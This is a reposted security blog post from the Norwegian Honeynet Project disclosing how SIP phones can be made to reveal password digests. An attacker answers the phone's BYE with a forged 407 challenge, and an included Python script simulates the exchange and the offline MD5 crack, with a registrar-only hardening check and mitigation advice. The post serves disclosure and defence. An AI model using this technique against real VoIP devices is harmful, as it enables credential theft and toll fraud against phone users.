Honeynet

March 8th, 2010

How to get the password from any SIP user-agent!

Story written by Sjur and originally posted on March 26th, 2009 on the Norwegian Honeynet Project

This is really, really, really bad!
If I know the IP address of your SIP user agent and your extension, I can get your password. Not true? Here is how Sandro and I did it! Sandro Gauci also has a tool (voippack for Canvas) which automates the whole process; you can watch the video here!

The master plan:
Find out which ISPs deliver VoIP. Look up their IP ranges in RIPE. Scan those ranges for SIP devices.
Get the extensions they use (or their username ranges, e.g. phone numbers), then brute-force those ranges against each IP.
Send an INVITE to the correct extension and the phone will ring. When the user hangs up, we get the hashed password.

The details:
We make the phone authenticate its own BYE. When the user hangs up, the SIP user agent sends a BYE to the address it believes is the proxy for the call, which in this case is us. We answer with "407 Proxy Authentication Required" carrying a realm and a nonce of our choosing, and the user agent re-sends the BYE with a Proxy-Authorization header: an MD5 digest of the username, realm and password combined with our nonce and the request URI. Because we chose the realm and the nonce, that digest can be brute-forced offline at MD5 speed until it matches, which yields the password.

The problem
The SIP stack is not tied to the IP layer. Why does the SIP user agent answer SIP messages from IP addresses other than the registrar or proxy it is registered with? There should be a default rule: "drop all SIP messages that do not come from the server I registered with."
Why does the user agent blindly answer a challenge to its own BYE? Send it a "407" and the SIP UA hands over a digest of the password...
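The exchange described under "The details", together with the source check asked for under "The problem", as an added Python example that is not part of the original post and is not Sandro's voippack: the phone's BYE, the attacker's 407 with a chosen realm and nonce, the re-sent BYE carrying the MD5 digest, the offline brute force of that digest, and the registrar-only rule a hardened user agent would apply. The IP addresses, extension, password, Call-ID and wordlist are constructed for the demo; the digest formula is the RFC 3261 one without qop.

```python
import hashlib
import re

# Constructed values for the demo (not from the original post).
REGISTRAR_IP = "192.0.2.10"          # the UA's real registrar/proxy
ATTACKER_IP = "198.51.100.7"         # where our INVITE came from
UA_USER = "4712345678"               # the victim's extension (SIP username)
UA_PASSWORD = "secret42"             # deliberately weak so the demo crack succeeds
ATTACKER_REALM = "asterisk"          # we pick the realm...
ATTACKER_NONCE = "0123456789abcdef"  # ...and the nonce; the UA cannot verify either

# The BYE the phone sends towards us when the user hangs up (constructed).
BYE = (
    f"BYE sip:1000@{ATTACKER_IP} SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 203.0.113.5:5060;branch=z9hG4bK776asdhds\r\n"
    f"From: <sip:{UA_USER}@203.0.113.5>;tag=1928301774\r\n"
    f"To: <sip:1000@{ATTACKER_IP}>;tag=attk1\r\n"
    "Call-ID: a84b4c76e66710\r\n"
    "CSeq: 1 BYE\r\n"
    "Content-Length: 0\r\n\r\n"
)


def md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(user, realm, password, method, uri, nonce):
    """RFC 3261 digest response without qop: MD5(HA1 ':' nonce ':' HA2)."""
    ha1 = md5(f"{user}:{realm}:{password}")
    ha2 = md5(f"{method}:{uri}")
    return md5(f"{ha1}:{nonce}:{ha2}")


def parse_sip(msg):
    """Split a SIP message into (start line, {lower-cased header: value})."""
    lines = msg.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_digest_params(value):
    """'Digest realm="x", nonce="y"' -> {'realm': 'x', 'nonce': 'y'}."""
    return dict(re.findall(r'(\w+)="?([^",]+)"?', value.split(" ", 1)[1]))


def build_407(bye_msg, realm, nonce):
    """Attacker side: answer the phone's BYE with a challenge we control."""
    _, h = parse_sip(bye_msg)
    return (
        "SIP/2.0 407 Proxy Authentication Required\r\n"
        f"Via: {h['via']}\r\nFrom: {h['from']}\r\nTo: {h['to']}\r\n"
        f"Call-ID: {h['call-id']}\r\nCSeq: {h['cseq']}\r\n"
        f'Proxy-Authenticate: Digest realm="{realm}", nonce="{nonce}", algorithm=MD5\r\n'
        "Content-Length: 0\r\n\r\n"
    )


def vulnerable_ua_retry(bye_msg, challenge, user, password):
    """Models the tested phones: re-send the BYE with credentials for whatever challenge arrived."""
    start, h = parse_sip(bye_msg)
    method, uri = start.split()[0], start.split()[1]
    p = parse_digest_params(parse_sip(challenge)[1]["proxy-authenticate"])
    resp = digest_response(user, p["realm"], password, method, uri, p["nonce"])
    auth = (f'Proxy-Authorization: Digest username="{user}", realm="{p["realm"]}", '
            f'nonce="{p["nonce"]}", uri="{uri}", response="{resp}", algorithm=MD5\r\n')
    seq = int(h["cseq"].split()[0]) + 1
    return (bye_msg.replace(f"CSeq: {h['cseq']}", f"CSeq: {seq} {method}")
                   .replace("Content-Length:", auth + "Content-Length:"))


def crack(authorized_bye, wordlist):
    """Offline: user, realm, nonce, method and uri are all known, so each guess costs three MD5s."""
    start, h = parse_sip(authorized_bye)
    method = start.split()[0]
    p = parse_digest_params(h["proxy-authorization"])
    for pw in wordlist:
        if digest_response(p["username"], p["realm"], pw, method, p["uri"], p["nonce"]) == p["response"]:
            return pw
    return None


def accept_signalling(src_ip, registrar_ip):
    """The rule the post asks for: only handle SIP signalling from the server we registered with."""
    return src_ip == registrar_ip


def run_attack(hardened_ua=False, wordlist=("password", "1234", "secret42")):
    """Return the recovered password, or None if the UA refused to answer the challenge."""
    challenge = build_407(BYE, ATTACKER_REALM, ATTACKER_NONCE)
    if hardened_ua and not accept_signalling(ATTACKER_IP, REGISTRAR_IP):
        return None  # a hardened UA drops the 407 (and the INVITE before it) from a non-registrar
    answered = vulnerable_ua_retry(BYE, challenge, UA_USER, UA_PASSWORD)
    return crack(answered, wordlist)


if __name__ == "__main__":
    print("vulnerable UA:", run_attack(False))
    print("hardened UA:  ", run_attack(True))
```

Two things the code makes visible that the prose only implies: the attacker never needs to know the provider's real realm, because the phone will happily compute HA1 with whatever realm is in the challenge, and a three-entry wordlist is only for the demo; with a nonce you chose yourself, the crack is limited purely by password entropy, which is why the provider advice below insists on long passwords.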

Units tested (password recovered from each)
Linksys SPA2102
Grandstream GXV3000 (latest firmware)
AVM Fritz 7270 (firmware December 2008)

The units that will be tested further:
Polycom
Thomson ST2030
Snom

How to protect yourself (for users)
Make sure your VoIP provider has credit limits! You don’t want to get a huge phone bill!
Report any unusual phone calls or strange behavior!

How to protect yourself (for VoIP providers)
Protect your SIP user agents! This is hard with the Fritz units, which are normally used as routers and therefore sit directly on the Internet.
Use very long SIP passwords drawn from the full character set (#¤%" and others), so that a captured digest cannot be brute-forced.
Change the SIP password regularly.
Run VoIP honeypots to detect scans in your area.

How serious do you think this is? Visit The Norwegian Honeynet Project and write your comments now!
